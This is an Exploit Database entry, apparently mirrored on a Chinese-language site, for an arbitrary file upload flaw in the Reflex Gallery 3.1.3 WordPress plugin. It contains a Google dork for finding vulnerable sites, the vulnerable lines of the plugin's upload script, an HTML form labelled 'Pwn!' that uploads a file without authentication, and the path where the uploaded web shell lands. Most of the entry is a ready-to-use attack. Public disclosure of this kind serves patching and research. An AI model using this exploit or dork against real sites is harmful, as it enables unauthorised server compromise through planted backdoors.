WordPress Plugin Reflex Gallery 3.1.3 – Arbitrary File Upload

• Exploit Database
• 17 阅读

• 作者： CrashBandicot
  日期： 2015-03-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36374/

• # Exploit Title: WordPress Plugin Reflex Gallery - Arbitrary File Upload
  # Google Dork: inurl:wp-content/plugins/reflex-gallery/
  # Date: 08.03.2015
  # Exploit Author: CrashBandicot @DosPerl
  # Vendor Homepage: https://wordpress.org/plugins/reflex-gallery/
  # Software Link: https://downloads.wordpress.org/plugin/reflex-gallery.zip
  # Version: 3.1.3 (Last)
  # Tested on: Windows
   
  # p0C : http://i.imgur.com/mj8yADU.png
   
  # Path : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
  # add Month and Year in GET for Folder of Shell ./wp-content/uploads/" .$_GET['Year'].'/'.$_GET['Month']. "
  
  Vulnerable File : php.php
  50.if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
  173. $result = $uploader->handleUpload('../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/');
   
   
  # Exploit :
   
  <form method="POST" action="http://127.0.0.1:1337/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03" enctype="multipart/form-data" >
  <input type="file" name="qqfile"><br>
  <input type="submit" name="Submit" value="Pwn!">
  </form>
   
   
  # Shell Path : http://127.0.0.1:1337/wordpress/wp-content/uploads/2015/03/backdoor.php